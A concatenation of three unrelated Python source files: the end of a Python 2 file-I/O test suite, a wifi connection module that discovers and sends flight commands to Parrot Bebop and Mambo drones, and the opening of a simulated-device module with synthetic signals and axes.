percent = 100. - 100.*self.close_success_count/self.close_count
print self.close_count, ('%.4f ' % percent),
def test_close_open(self):
def io_func():
pass
self._test_close_open_io(io_func)
def test_close_open_flush(self):
def io_func():
self.f.flush()
self._test_close_open_io(io_func)
def test_close_open_iter(self):
def io_func():
list(iter(self.f))
self._test_close_open_io(io_func)
def test_close_open_isatty(self):
def io_func():
self.f.isatty()
self._test_close_open_io(io_func)
def test_close_open_print(self):
def io_func():
print >> self.f, ''
self._test_close_open_io(io_func)
def test_close_open_print_buffered(self):
self.use_buffering = True
def io_func():
print >> self.f, ''
self._test_close_open_io(io_func)
def test_close_open_read(self):
def io_func():
self.f.read(0)
self._test_close_open_io(io_func)
def test_close_open_readinto(self):
def io_func():
a = array('c', 'xxxxx')
self.f.readinto(a)
self._test_close_open_io(io_func)
def test_close_open_readline(self):
def io_func():
self.f.readline()
self._test_close_open_io(io_func)
def test_close_open_readlines(self):
def io_func():
self.f.readlines()
self._test_close_open_io(io_func)
def test_close_open_seek(self):
def io_func():
self.f.seek(0, 0)
self._test_close_open_io(io_func)
def test_close_open_tell(self):
def io_func():
self.f.tell()
self._test_close_open_io(io_func)
def test_close_open_truncate(self):
def io_func():
self.f.truncate()
self._test_close_open_io(io_func)
def test_close_open_write(self):
def io_func():
self.f.write('')
self._test_close_open_io(io_func)
def test_close_open_writelines(self):
def io_func():
self.f.writelines('')
self._test_close_open_io(io_func)
class StdoutTests(unittest.TestCase):
def test_move_stdout_on_write(self):
# Issue 3242: sys.stdout can be replaced (and freed) during a
# print statement; prevent a segfault in this case
save_stdout = sys.stdout
class File:
def write(self, data):
if '\n' in data:
sys.stdout = save_stdout
try:
sys.stdout = File()
print "some text"
finally:
sys.stdout = save_stdout
def test_del_stdout_before_print(self):
# Issue 4597: 'print' with no argument wasn't reporting when
# sys.stdout was deleted.
save_stdout = sys.stdout
del sys.stdout
try:
print
except RuntimeError as e:
self.assertEquals(str(e), "lost sys.stdout")
else:
self.fail("Expected RuntimeError")
finally:
sys.stdout = save_stdout
def test_main():
# Historically, these tests have been sloppy about removing TESTFN.
# So get rid of it no matter what.
try:
run_unittest(AutoFileTests, OtherFileTests, FileSubclassTests,
FileThreadingTests, StdoutTests)
finally:
if os.path.exists(TESTFN):
os.unlink(TESTFN)
if __name__ == '__main__':
test_main()
|
wifiConnection.py
|
"""
Holds all the data and commands needed to fly a Bebop or Mambo drone over wifi.
Author: Amy McGovern, dramymcgovern@gmail.com
"""
from zeroconf import ServiceBrowser, Zeroconf
import time
import socket
import ipaddress
import json
from util.colorPrint import color_print
import struct
import threading
from commandsandsensors.DroneSensorParser import get_data_format_and_size
class mDNSListener(object):
"""
This is adapted from the listener code at
https://pypi.python.org/pypi/zeroconf
"""
def __init__(self, wifi_connection):
self.wifi_connection = wifi_connection
def remove_service(self, zeroconf, type, name):
#print("Service %s removed" % (name,))
pass
def add_service(self, zeroconf, type, name):
info = zeroconf.get_service_info(type, name)
print("Service %s added, service info: %s" % (name, info))
self.wifi_connection._connect_listener_called(info)
class WifiConnection:
def __init__(self, drone, drone_type="Bebop"):
"""
Can be a connection to a Bebop or a Mambo right now
:param drone: drone object whose update_sensors() method will receive incoming sensor data
:param drone_type: type of drone to connect to ("Bebop" or "Mambo")
"""
self.is_connected = False
if (drone_type not in ("Bebop", "Mambo")):
color_print("Error: only type Bebop and Mambo are currently supported", "ERROR")
return
self.drone = drone
self.drone_type = drone_type
self.udp_send_port = 0 # defined during the handshake
self.udp_receive_port = 43210
self.is_listening = True # for the UDP listener
if (drone_type == "Bebop"):
self.mdns_address = "_arsdk-090c._udp.local."
#Bebop video streaming
self.stream_port = 55004
self.stream_control_port = 55005
elif (drone_type == "Mambo"):
self.mdns_address = "_arsdk-090b._udp.local."
# map of the data types by name (for outgoing packets)
self.data_types_by_name = {
'ACK' : 1,
'DATA_NO_ACK': 2,
'LOW_LATENCY_DATA': 3,
'DATA_WITH_ACK' : 4
}
# map of the incoming data types by number (to figure out if we need to ack etc)
self.data_types_by_number = {
1 : 'ACK',
2 : 'DATA_NO_ACK',
3 : 'LOW_LATENCY_DATA',
4 : 'DATA_WITH_ACK'
}
self.sequence_counter = {
'PONG': 0,
'SEND_NO_ACK': 0,
'SEND_WITH_ACK': 0,
'SEND_HIGH_PRIORITY': 0,
'VIDEO_ACK': 0,
'ACK_DRONE_DATA': 0,
'NO_ACK_DRONE_DATA': 0,
'VIDEO_DATA': 0,
}
self.buffer_ids = {
'PING': 0, # pings from device
'PONG': 1, # respond to pings
'SEND_NO_ACK': 10, # non-acknowledged commands (piloting and camera rotations)
'SEND_WITH_ACK': 11, # acknowledged commands (all piloting commands)
'SEND_HIGH_PRIORITY': 12, # emergency commands
'VIDEO_ACK': 13, # ack for video
'ACK_DRONE_DATA' : 127, # drone data that needs an ack
'NO_ACK_DRONE_DATA' : 126, # data from drone (including battery and others), no ack
'VIDEO_DATA' : 125, # video data
'ACK_FROM_SEND_WITH_ACK': 139 # 128 + buffer id for 'SEND_WITH_ACK' is 139
}
self.data_buffers = (self.buffer_ids['ACK_DRONE_DATA'], self.buffer_ids['NO_ACK_DRONE_DATA'])
# store whether a command was acked
self.command_received = {
'SEND_WITH_ACK': False,
'SEND_HIGH_PRIORITY': False,
'ACK_COMMAND': False
}
# maximum number of times to try a packet before assuming it failed
self.max_packet_retries = 1
# threading lock for waiting
self._lock = threading.Lock()
def connect(self, num_retries):
"""
Connects to the drone
:param num_retries: maximum number of retries
:return: True if the connection succeeded and False otherwise
"""
zeroconf = Zeroconf()
listener = mDNSListener(self)
browser = ServiceBrowser(zeroconf, self.mdns_address , listener)
# basically have to sleep until the info comes through on the listener
num_tries = 0
while (num_tries < num_retries and not self.is_connected):
time.sleep(1)
num_tries += 1
# if we didn't hear the listener, return False
if (not self.is_connected):
color_print("connection failed: did you remember to connect your machine to the Drone's wifi network?", "ERROR")
return False
else:
browser.cancel()
# perform the handshake and get the UDP info
handshake = self._handshake(num_retries)
if (handshake):
self._create_udp_connection()
self.listener_thread = threading.Thread(target=self._listen_socket)
self.listener_thread.start()
color_print("Success in setting up the wifi network to the drone!", "SUCCESS")
return True
else:
color_print("Error: TCP handshake failed.", "ERROR")
return False
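# Illustrative usage sketch (the ``my_drone`` object is hypothetical -- the only
# requirement visible in this class is that it provides the update_sensors()
# method called from handle_frame() below):
#
# conn = WifiConnection(my_drone, drone_type="Mambo")
# if conn.connect(num_retries=5):
#     # send commands / read sensors here, then shut the listener down
#     conn.disconnect()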
def _listen_socket(self):
"""
Listens to the socket and sleeps in between receives.
Runs forever (until disconnect is called)
"""
print("starting listening at ")
lasttime = time.time()
data = None
while (self.is_listening):
lasttime = time.time()
try:
(data, address) = self.udp_receive_sock.recvfrom(66000)
except socket.timeout:
print("timeout - trying again")
except:
pass
self.handle_data(data)
color_print("disconnecting", "INFO")
self.disconnect()
def handle_data(self, data):
"""
Handles the data as it comes in
:param data: raw data packet
:return:
"""
# got the idea of how to handle this data nicely (handling any extra data in the packets)
# and unpacking the critical info first (id, size etc) from
# https://github.com/N-Bz/bybop/blob/8d4c569c8e66bd1f0fdd768851409ca4b86c4ecd/src/Bybop_NetworkAL.py
my_data = data
while (my_data):
#print("inside loop to handle data ")
(data_type, buffer_id, packet_seq_id, packet_size) = struct.unpack('<BBBI', my_data[0:7])
recv_data = my_data[7:packet_size]
#print("\tgot a data type of of %d " % data_type)
#print("\tgot a buffer id of of %d " % buffer_id)
#print("\tgot a packet seq id of of %d " % packet_seq_id)
#print("\tsize is %d" % packet_size)
self.handle_frame(data_type, buffer_id, packet_seq_id, recv_data)
# loop in case there is more data
my_data = my_data[packet_size:]
#print("assigned more data")
#print("ended loop handling data")
def handle_frame(self, packet_type, buffer_id, packet_seq_id, recv_data):
if (buffer_id == self.buffer_ids['PING']):
#color_print("this is a ping! need to pong", "INFO")
self._send_pong(recv_data)
if (self.data_types_by_number[packet_type] == 'ACK'):
#print("setting command received to true")
ack_seq = int(struct.unpack("<B", recv_data)[0])
self._set_command_received('SEND_WITH_ACK', True, ack_seq)
self.ack_packet(buffer_id, ack_seq)
elif (self.data_types_by_number[packet_type] == 'DATA_NO_ACK'):
#print("DATA NO ACK")
if (buffer_id in self.data_buffers):
self.drone.update_sensors(packet_type, buffer_id, packet_seq_id, recv_data, ack=False)
elif (self.data_types_by_number[packet_type] == 'LOW_LATENCY_DATA'):
print("Need to handle Low latency data")
elif (self.data_types_by_number[packet_type] == 'DATA_WITH_ACK'):
#print("DATA WITH ACK")
if (buffer_id in self.data_buffers):
self.drone.update_sensors(packet_type, buffer_id, packet_seq_id, recv_data, ack=True)
        else:
            color_print("unknown data type %d - not handled" % packet_type, "ERROR")
def _send_pong(self, data):
"""
Send a PONG back to a PING
:param data: data that needs to be PONG/ACK'd
:return: nothing
"""
size = len(data)
self.sequence_counter['PONG'] = (self.sequence_counter['PONG'] + 1) % 256
packet = struct.pack("<BBBI", self.data_types_by_name['DATA_NO_ACK'], self.buffer_ids['PONG'],
self.sequence_counter['PONG'], size + 7)
packet += data
self.safe_send(packet)
def _set_command_received(self, channel, val, seq_id):
"""
Set the command received on the specified channel to the specified value (used for acks)
:param channel: channel
:param val: True or False
:return:
"""
self.command_received[(channel, seq_id)] = val
def _is_command_received(self, channel, seq_id):
"""
Is the command received?
:param channel: channel it was sent on
:param seq_id: sequence id of the command
:return:
"""
return self.command_received[(channel, seq_id)]
def _handshake(self, num_retries):
"""
Performs the handshake over TCP to get all the connection info
:return: True if it worked and False otherwise
"""
# create the TCP socket for the handshake
tcp_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
#print (self.connection_info.address, self.connection_info.port)
#print(ipaddress.IPv4Address(self.connection_info.address))
self.drone_ip = ipaddress.IPv4Address(self.connection_info.address).exploded
# connect
tcp_sock.connect((self.drone_ip, self.connection_info.port))
# send the handshake information
if(self.drone_type=="Bebop"):
# For Bebop add video stream ports to the json request
json_string = json.dumps({"d2c_port":self.udp_receive_port,
"controller_type":"computer",
"controller_name":"pyparrot",
"arstream2_client_stream_port":self.stream_port,
"arstream2_client_control_port":self.stream_control_port})
else:
json_string = json.dumps({"d2c_port":self.udp_receive_port,
"controller_type":"computer",
"controller_name":"pyparrot"})
json_obj = json.loads(json_string)
print(json_string)
try:
# python 3
tcp_sock.send(bytes(json_string, 'utf-8'))
except:
# python 2
tcp_sock.send(json_string)
# wait for the response
finished = False
num_try = 0
while (not finished and num_try < num_retries):
data = tcp_sock.recv(4096).decode('utf-8')
if (len(data) > 0):
my_data = data[0:-1]
self.udp_data = json.loads(str(my_data))
# if the drone refuses the connection, return false
if (self.udp_data['status'] != 0):
return False
print(self.udp_data)
self.udp_send_port = self.udp_data['c2d_port']
print("c2d_port is %d" % self.udp_send_port)
finished = True
else:
num_try += 1
# cleanup
tcp_sock.close()
return finished
def _create_udp_connection(self):
"""
Create the UDP connection
"""
self.udp_send_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
#self.udp_send_sock.connect((self.drone_ip, self.udp_send_port))
self.udp_receive_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
# don't use the connect, use bind instead
# learned from bybop code
# https://github.com/N-Bz/bybop/blob/8d4c569c8e66bd1f0fdd768851409ca4b86c4ecd/src/Bybop_NetworkAL.py
#self.udp_receive_sock.connect((self.drone_ip, self.udp_receive_port))
self.udp_receive_sock.settimeout(5.0)
self.udp_receive_sock.bind(('0.0.0.0', int(self.udp_receive_port)))
def _connect_listener_called(self, connection_info):
"""
        Save the connection info and set connected to True. This is called within the listener
        for the connection.
:param connection_info:
:return:
"""
self.connection_info = connection_info
self.is_connected = True
def disconnect(self):
"""
Disconnect cleanly from the sockets
"""
self.is_listening = False
# Sleep for a moment to allow all socket activity to cease before closing
        # This helps to avoid a Winsock error regarding operations on a closed socket
self.smart_sleep(0.5)
# then put the close in a try/except to catch any further winsock errors
# the errors seem to be mostly occurring on windows for some reason
try:
self.udp_receive_sock.close()
self.udp_send_sock.close()
except:
pass
def safe_send(self, packet):
packet_sent = False
#print "inside safe send"
try_num = 0
while (not packet_sent and try_num < self.max_packet_retries):
try:
self.udp_send_sock.sendto(packet, (self.drone_ip, self.udp_send_port))
packet_sent = True
except:
#print "resetting connection"
self.udp_send_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
#self.udp_send_sock.connect((self.drone_ip, self.udp_send_port))
try_num += 1
def send_command_packet_ack(self, packet, seq_id):
"""
Sends the actual packet on the ack channel. Internal function only.
:param packet: packet constructed according to the command rules (variable size, constructed elsewhere)
:return: True if the command was sent and False otherwise
"""
try_num = 0
self._set_command_received('SEND_WITH_ACK', False, seq_id)
while (try_num < self.max_packet_retries and not self._is_command_received('SEND_WITH_ACK', seq_id)):
color_print("sending packet on try %d", try_num)
self.safe_send(packet)
try_num += 1
self.smart_sleep(0.5)
return self._is_command_received('SEND_WITH_ACK', seq_id)
def send_command_packet_noack(self, packet):
"""
Sends the actual packet on the No-ack channel. Internal function only.
:param packet: packet constructed according to the command rules (variable size, constructed elsewhere)
:return: True if the command was sent and False otherwise
"""
try_num = 0
color_print("sending packet on try %d", try_num)
self.safe_send(packet)
def send_noparam_command_packet_ack(self, command_tuple):
"""
Send a no parameter command packet on the ack channel
:param command_tuple:
:return:
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBH", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 11,
command_tuple[0], command_tuple[1], command_tuple[2])
self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def send_param_command_packet(self, command_tuple, param_tuple=None, param_type_tuple=0,ack=True):
"""
        Send a command packet with parameters. The ack channel is optional for future flexibility,
        but currently commands are always sent over the ack channel, so it defaults to True.
Contributed by awm102 on github
:param: command_tuple: the command tuple derived from command_parser.get_command_tuple()
:param: param_tuple (optional): the parameter values to be sent (can be found in the XML files)
        :param: param_type_tuple (optional): a tuple of strings representing the data type of the parameters
e.g. u8, float etc. (can be found in the XML files)
:param: ack (optional): allows ack to be turned off if required
:return:
"""
# TODO: This function could potentially be extended to encompass send_noparam_command_packet_ack
# and send_enum_command_packet_ack if desired for more modular code.
# TODO: The function could be improved by looking up the parameter data types in the xml files
# in the same way the send_enum_command_packet_ack does.
        # Create lists to store the number of bytes and pack chars needed for parameters.
        # Default them to empty so that the packet size is still correct when no params
        # are provided (len(param_tuple) would raise a TypeError when param_tuple is None).
        num_params = len(param_tuple) if param_tuple is not None else 0
        param_size_list = [0] * num_params
        pack_char_list = [0] * num_params
if param_tuple is not None:
# Fetch the parameter sizes. By looping over the param_tuple we only get the data
# for requested parameters so a mismatch in params and types does not matter
for i,param in enumerate(param_tuple):
pack_char_list[i], param_size_list[i] = get_data_format_and_size(param, param_type_tuple[i])
if ack:
ack_string = 'SEND_WITH_ACK'
data_ack_string = 'DATA_WITH_ACK'
else:
ack_string = 'SEND_NO_ACK'
data_ack_string = 'DATA_NO_ACK'
# Construct the base packet
self.sequence_counter[ack_string] = (self.sequence_counter[ack_string] + 1) % 256
# Calculate packet size:
# base packet <BBBIBBH is 11 bytes, param_size_list can be added up
packet_size = 11 + sum(param_size_list)
packet = struct.pack("<BBBIBBH", self.data_types_by_name[data_ack_string],
self.buffer_ids[ack_string],
self.sequence_counter[ack_string], packet_size,
command_tuple[0], command_tuple[1], command_tuple[2])
if param_tuple is not None:
# Add in the parameter values based on their sizes
for i,param in enumerate(param_tuple):
packet += struct.pack(pack_char_list[i],param)
if ack:
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
else:
return self.send_command_packet_noack(packet)
def send_pcmd_command(self, command_tuple, roll, pitch, yaw, vertical_movement, duration):
"""
Send the PCMD command with the specified roll, pitch, and yaw
:param command_tuple: command tuple per the parser
:param roll:
:param pitch:
:param yaw:
:param vertical_movement:
:param duration:
"""
start_time = time.time()
while (time.time() - start_time < duration):
self.sequence_counter['SEND_NO_ACK'] = (self.sequence_counter['SEND_NO_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHBbbbbI",
self.data_types_by_name['DATA_NO_ACK'],
self.buffer_ids['SEND_NO_ACK'],
self.sequence_counter['SEND_NO_ACK'],
20,
command_tuple[0], command_tuple[1], command_tuple[2],
1, roll, pitch, yaw, vertical_movement, 0)
self.safe_send(packet)
self.smart_sleep(0.1)
def send_fly_relative_command(self, command_tuple, change_x, change_y, change_z, change_angle):
"""
Send the packet to fly relative (this is Bebop only).
:param command_tuple: command tuple per the parser
:param change_x: change in x
:param change_y: change in y
:param change_z: change in z
:param change_angle: change in angle
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHffff",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
27,
command_tuple[0], command_tuple[1], command_tuple[2],
change_x, change_y, change_z, change_angle)
self.safe_send(packet)
def send_turn_command(self, command_tuple, degrees):
"""
Build the packet for turning and send it
:param command_tuple: command tuple from the parser
:param degrees: how many degrees to turn
:return: True if the command was sent and False otherwise
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHh",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
13,
command_tuple[0], command_tuple[1], command_tuple[2],
degrees)
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def send_camera_move_command(self, command_tuple, pan, tilt):
"""
Send the packet to move the camera (this is Bebop only).
:param command_tuple: command tuple per the parser
:param pan:
:param tilt:
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHff",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
19,
command_tuple[0], command_tuple[1], command_tuple[2],
pan, tilt)
self.safe_send(packet)
def send_enum_command_packet_ack(self, command_tuple, enum_value, usb_id=None):
"""
Send a command on the ack channel with enum parameters as well (most likely a flip).
        All commands except PCMD go on the ack channel per
http://forum.developer.parrot.com/t/ble-characteristics-of-minidrones/5912/2
the id of the last command sent (for use in ack) is the send counter (which is incremented before sending)
:param command_tuple: 3 tuple of the command bytes. 0 padded for 4th byte
:param enum_value: the enum index
:return: nothing
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
if (usb_id is None):
packet = struct.pack("<BBBIBBHI", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 15,
command_tuple[0], command_tuple[1], command_tuple[2],
enum_value)
else:
packet = struct.pack("<BBBIBBHBI", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 16,
command_tuple[0], command_tuple[1], command_tuple[2],
usb_id, enum_value)
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def smart_sleep(self, timeout):
"""
Sleeps the requested number of seconds but wakes up for notifications
Note: NEVER use regular time.sleep! It is a blocking sleep and it will likely
cause the WIFI to disconnect due to dropped notifications. Always use smart_sleep instead!
:param timeout: number of seconds to sleep
:return:
"""
start_time = time.time()
while (time.time() - start_time < timeout):
time.sleep(0.1)
def ack_packet(self, buffer_id, packet_id):
"""
Ack the packet id specified by the argument on the ACK_COMMAND channel
:param packet_id: the packet id to ack
:return: nothing
"""
#color_print("ack: buffer id of %d and packet id of %d" % (buffer_id, packet_id))
new_buf_id = (buffer_id + 128) % 256
if (new_buf_id not in self.sequence_counter):
self.sequence_counter[new_buf_id] = 0
else:
self.sequence_counter[new_buf_id] = (self.sequence_counter[new_buf_id] + 1) % 256
packet = struct.pack("<BBBIB", self.data_types_by_name['ACK'], new_buf_id,
self.sequence_counter[new_buf_id], 8,
packet_id)
self.safe_send(packet)
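# --- illustrative sketch (added by the editor, not part of pyparrot) ----------------
# The methods above all build frames with the same 7-byte ARNetworkAL-style header,
# struct format "<BBBI": data type, buffer id, sequence id, and total frame size
# (header plus payload).  The hypothetical helper below round-trips one such frame,
# e.g. the 8-byte ACK built in ack_packet() (buffer 139 = 128 + SEND_WITH_ACK).
def _example_pack_and_unpack_frame():
    import struct
    payload = struct.pack("<B", 3)   # e.g. the sequence id being acked
    # data type 1 is used purely for illustration here
    frame = struct.pack("<BBBI", 1, 139, 0, 7 + len(payload)) + payload
    (data_type, buffer_id, seq_id, size) = struct.unpack("<BBBI", frame[0:7])
    return data_type, buffer_id, seq_id, frame[7:size]   # payload recovered from the frame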
|
sim.py
|
import copy
import inspect
import itertools
from functools import partial
import numpy as np
import os
import random
import threading
import time as ttime
import uuid
import weakref
import warnings
from collections import deque, OrderedDict
from tempfile import mkdtemp
from .signal import Signal, EpicsSignal, EpicsSignalRO
from .areadetector.base import EpicsSignalWithRBV
from .status import DeviceStatus, StatusBase
from .device import (Device, Component as Cpt,
DynamicDeviceComponent as DDCpt, Kind)
from types import SimpleNamespace
from .pseudopos import (PseudoPositioner, PseudoSingle,
real_position_argument, pseudo_position_argument)
from .positioner import SoftPositioner
from .utils import ReadOnlyError, LimitError
from .log import logger
# two convenience functions 'vendored' from bluesky.utils
def new_uid():
return str(uuid.uuid4())
def short_uid(label=None, truncate=6):
"Return a readable but unique id like 'label-fjfi5a'"
if label:
return '-'.join([label, new_uid()[:truncate]])
else:
return new_uid()[:truncate]
class NullStatus(StatusBase):
"A simple Status object that is always immediately done, successfully."
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.set_finished()
class EnumSignal(Signal):
def __init__(self, *args, value=0, enum_strings, **kwargs):
super().__init__(*args, value=0, **kwargs)
self._enum_strs = tuple(enum_strings)
self._metadata['enum_strs'] = tuple(enum_strings)
self.put(value)
def put(self, value, **kwargs):
if value in self._enum_strs:
value = self._enum_strs.index(value)
elif isinstance(value, str):
err = f'{value} not in enum strs {self._enum_strs}'
raise ValueError(err)
return super().put(value, **kwargs)
def get(self, *, as_string=True, **kwargs):
"""
Implement getting as enum strings
"""
value = super().get()
if as_string:
if self._enum_strs is not None and isinstance(value, int):
return self._enum_strs[value]
elif value is not None:
return str(value)
return value
def describe(self):
desc = super().describe()
desc[self.name]['enum_strs'] = self._enum_strs
return desc
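# Illustrative sketch (added by the editor, not part of the original module):
# EnumSignal accepts either the enum string or its integer index on put(), stores the
# index internally, and returns the string from get() by default.
def _example_enum_signal():
    mode = EnumSignal(name='mode', value='idle',
                      enum_strings=('idle', 'run', 'fault'))
    mode.put('run')
    return mode.get(), mode.get(as_string=False)   # ('run', 1)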
class SynSignal(Signal):
"""
A synthetic Signal that evaluates a Python function when triggered.
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal does not change the value.
name : string, keyword only
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
precision : integer, optional
Digits of precision. Default is 3.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
    kind : a member of the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
# This signature is arranged to mimic the signature of EpicsSignal, where
# the Python function (func) takes the place of the PV.
def __init__(self, func=None, *,
name, # required, keyword-only
exposure_time=0,
precision=3,
parent=None,
labels=None,
kind=None,
**kwargs):
if func is None:
# When triggered, just put the current value.
func = self.get
# Initialize readback with 0.
self._readback = 0
sentinel = object()
loop = kwargs.pop('loop', sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2
)
self._func = func
self.exposure_time = exposure_time
self.precision = precision
super().__init__(value=self._func(), timestamp=ttime.time(), name=name,
parent=parent, labels=labels, kind=kind, **kwargs)
self._metadata.update(
connected=True,
)
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of generality....
for k in res:
res[k]['precision'] = self.precision
return res
def trigger(self):
st = DeviceStatus(device=self)
delay_time = self.exposure_time
if delay_time:
def sleep_and_finish():
self.log.info('sleep_and_finish %s', self)
ttime.sleep(delay_time)
self.put(self._func())
st.set_finished()
threading.Thread(target=sleep_and_finish, daemon=True).start()
else:
self.put(self._func())
st.set_finished()
return st
def sim_set_func(self, func):
"""
Update the SynSignal function to set a new value on trigger.
"""
self._func = func
class SynSignalRO(SynSignal):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._metadata.update(
connected=True,
write_access=False,
)
def put(self, value, *, timestamp=None, force=False):
msg = f"{self}.put(value={value}, timestamp={timestamp}, force={force})"
self.log.error(msg)
raise ReadOnlyError(msg)
def set(self, value, *, timestamp=None, force=False):
msg = f"{self} is readonly"
self.log.error(msg)
raise ReadOnlyError(msg)
class SynPeriodicSignal(SynSignal):
"""
A synthetic Signal that evaluates a Python function periodically.
The signal value is updated in a background thread. To start the thread,
call the `start_simulation()` method before the beginning of simulation.
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal generates white noise on [0, 1].
name : string, keyword only
period : number, optional
How often the Signal's value is updated in the background. Default is
1 second.
period_jitter : number, optional
Random Gaussian variation of the period. Default is 1 second.
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
    kind : a member of the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
def __init__(self, func=None, *,
name, # required, keyword-only
period=1, period_jitter=1,
exposure_time=0,
parent=None,
labels=None,
kind=None,
**kwargs):
if func is None:
func = np.random.rand
self._period = period
self._period_jitter = period_jitter
super().__init__(name=name, func=func,
exposure_time=exposure_time,
parent=parent, labels=labels, kind=kind,
**kwargs)
self.__thread = None
def start_simulation(self):
"""
Start background thread that performs periodic value updates. The method
should be called at least once before the beginning of simulation. Multiple
calls to the method are ignored.
"""
if self.__thread is None:
def periodic_update(ref, period, period_jitter):
while True:
signal = ref()
if not signal:
# Our target Signal has been garbage collected. Shut
# down the Thread.
return
signal.put(signal._func())
del signal
# Sleep for period +/- period_jitter.
ttime.sleep(
max(self._period + self._period_jitter * np.random.randn(), 0))
self.__thread = threading.Thread(target=periodic_update,
daemon=True,
args=(weakref.ref(self),
self._period,
self._period_jitter))
self.__thread.start()
def _start_simulation_deprecated(self):
"""Call `start_simulation` and print deprecation warning."""
if self.__thread is None:
msg = ("Deprecated API: Objects of SynPeriodicSignal must be initialized before simulation\n"
"by calling 'start_simulation()' method. Two such objects ('rand' and 'rand2') are\n"
"created by 'ophyd.sim' module. Call\n"
" rand.start_simulation() or rand2.start_simulation()\n"
"before the object is used.")
self.log.warning(msg)
self.start_simulation()
def trigger(self):
self._start_simulation_deprecated()
return super().trigger()
def get(self, **kwargs):
self._start_simulation_deprecated()
return super().get(**kwargs)
def put(self, *args, **kwargs):
self._start_simulation_deprecated()
super().put(*args, **kwargs)
def set(self, *args, **kwargs):
self._start_simulation_deprecated()
return super().set(*args, **kwargs)
def read(self):
self._start_simulation_deprecated()
return super().read()
def subscribe(self, *args, **kwargs):
self._start_simulation_deprecated()
return super().subscribe(*args, **kwargs)
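# Illustrative sketch (added by the editor, not part of the original module): the
# background updates only begin after an explicit start_simulation() call; the
# numbers below (period, sleep time) are arbitrary choices for the example.
def _example_periodic_signal():
    noisy = SynPeriodicSignal(name='noisy', period=0.1, period_jitter=0.0)
    noisy.start_simulation()     # launch the daemon update thread exactly once
    ttime.sleep(0.3)             # give the thread time to push a few values
    return noisy.get()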
class _ReadbackSignal(Signal):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._metadata.update(
connected=True,
write_access=False,
)
def get(self):
self._readback = self.parent.sim_state['readback']
return self._readback
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of
# generality....
for k in res:
res[k]['precision'] = self.parent.precision
return res
@property
def timestamp(self):
'''Timestamp of the readback value'''
return self.parent.sim_state['readback_ts']
def put(self, value, *, timestamp=None, force=False):
raise ReadOnlyError("The signal {} is readonly.".format(self.name))
def set(self, value, *, timestamp=None, force=False):
raise ReadOnlyError("The signal {} is readonly.".format(self.name))
class _SetpointSignal(Signal):
def put(self, value, *, timestamp=None, force=False):
self._readback = float(value)
self.parent.set(float(value))
def get(self):
self._readback = self.parent.sim_state['setpoint']
return self.parent.sim_state['setpoint']
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of generality....
for k in res:
res[k]['precision'] = self.parent.precision
return res
@property
def timestamp(self):
'''Timestamp of the readback value'''
return self.parent.sim_state['setpoint_ts']
class SynAxis(Device):
"""
    A synthetic, settable Device that mimics any 1D axis (position, temperature, etc.).
Parameters
----------
name : string, keyword only
readback_func : callable, optional
When the Device is set to ``x``, its readback will be updated to
``f(x)``. This can be used to introduce random noise or a systematic
offset.
Expected signature: ``f(x) -> value``.
value : object, optional
The initial value. Default is 0.
delay : number, optional
Simulates how long it takes the device to "move". Default is 0 seconds.
precision : integer, optional
Digits of precision. Default is 3.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
    kind : a member of the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
readback = Cpt(_ReadbackSignal, value=0, kind='hinted')
setpoint = Cpt(_SetpointSignal, value=0, kind='normal')
